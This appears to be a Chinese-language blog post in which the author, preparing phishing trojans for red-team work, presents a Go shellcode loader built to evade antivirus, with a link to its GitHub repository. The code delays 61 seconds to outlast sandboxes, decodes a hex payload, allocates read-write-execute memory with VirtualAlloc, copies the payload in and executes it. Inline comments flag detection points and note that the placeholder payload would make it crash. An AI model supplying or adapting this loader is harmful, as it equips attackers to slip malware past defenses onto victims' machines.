
Golang加载shellcode实现免杀


最近打红队，想搞个木马钓鱼用，刚好最近在学习 Go 语言，便研究了一下 Golang 的免杀。免杀效果大概是这个样子。

https://cdn.bingbingzi.cn/blog/20211210165105.jpg

https://cdn.bingbingzi.cn/blog/20211210165311.png

代码

package main

import (
	"encoding/hex"
	"syscall"
	"time"
	"unsafe"
)

// Win32 flags handed to VirtualAlloc in main(). The values match the SDK
// definitions. PAGE_EXECUTE_READWRITE asks for a private region that is
// writable and executable at the same time; an RWX allocation in a process's
// own address space is one of the loudest signals memory scanners and
// EDR allocation telemetry key on, so from a defender's side this constant
// is the first thing to look for.
const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

var (
	// Resolved at package init. MustLoadDLL/MustFindProc panic when the DLL
	// or export cannot be found, so the binary aborts before main() runs on
	// anything but a Windows host that exposes these two routines. The import
	// of kernel32!VirtualAlloc next to ntdll!RtlCopyMemory is itself a
	// recognisable import-table pattern for static triage.
	kernel32      = syscall.MustLoadDLL("kernel32.dll")
	ntdll         = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
	// Hex-encoded payload string (elided in the post). Declared but never
	// referenced by main() below, which decodes decode1 instead.
	code          = "fc4883e4f0e8c..." // hex string of the machine code
	// The value main() actually decodes. As written, "shellcode" is not
	// valid hex, so hex.DecodeString fails and main() discards that error —
	// see the note on &xor_code[0] there.
	decode1       = "shellcode"
)

// main is the loader entry point: wait, decode the embedded payload, copy it
// into an RWX region of the current process, then transfer control to it.
// Every step here is a documented process-injection telemetry point
// (RWX VirtualAlloc, write into that region, execution from memory that is
// not backed by any mapped image); comments below mark them.
func main() {

	// Fixed 61 s delay before touching anything — presumably meant to outlast
	// automated sandbox analysis windows. Sleep skipping / time acceleration
	// in the sandbox neutralises it.
	time.Sleep(61 * time.Second)

	// The hex.DecodeString error is discarded. With decode1 = "shellcode" the
	// input is not hex, decode comes back empty, and &xor_code[0] below
	// panics with an index-out-of-range; the listing only runs once decode1
	// holds a valid hex payload.
	decode, _ := hex.DecodeString(decode1)
	// Despite the name, no XOR is applied: xor_code aliases decode unchanged.
	xor_code := decode

	// VirtualAlloc(NULL, len, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE):
	// requests a writable+executable private region. Telemetry point #1.
	addr, _, err := VirtualAlloc.Call(0, uintptr(len(xor_code)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	// Proc.Call returns a non-nil error even on success, so success is
	// recognised here by comparing against the English ERROR_SUCCESS text;
	// on any other message the process exits silently with status 0.
	if err != nil && err.Error() != "The operation completed successfully." {
		syscall.Exit(0)
	}
	// RtlCopyMemory(addr, &xor_code[0], len): writes the decoded bytes into
	// the RWX region. Telemetry point #2 (write to executable memory).
	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&xor_code[0])), uintptr(len(xor_code)))
	if err != nil && err.Error() != "The operation completed successfully." {
		syscall.Exit(0)
	}
	// syscall.Syscall's first argument is the procedure address on Windows,
	// so this calls addr with no arguments — i.e. jumps into the copied
	// bytes. Telemetry point #3: execution from unbacked memory, which
	// memory scanners and call-stack based detections flag.
	syscall.Syscall(addr, 0, 0, 0, 0)

}

开源:https://github.com/binganao/golang-shellcode-bypassav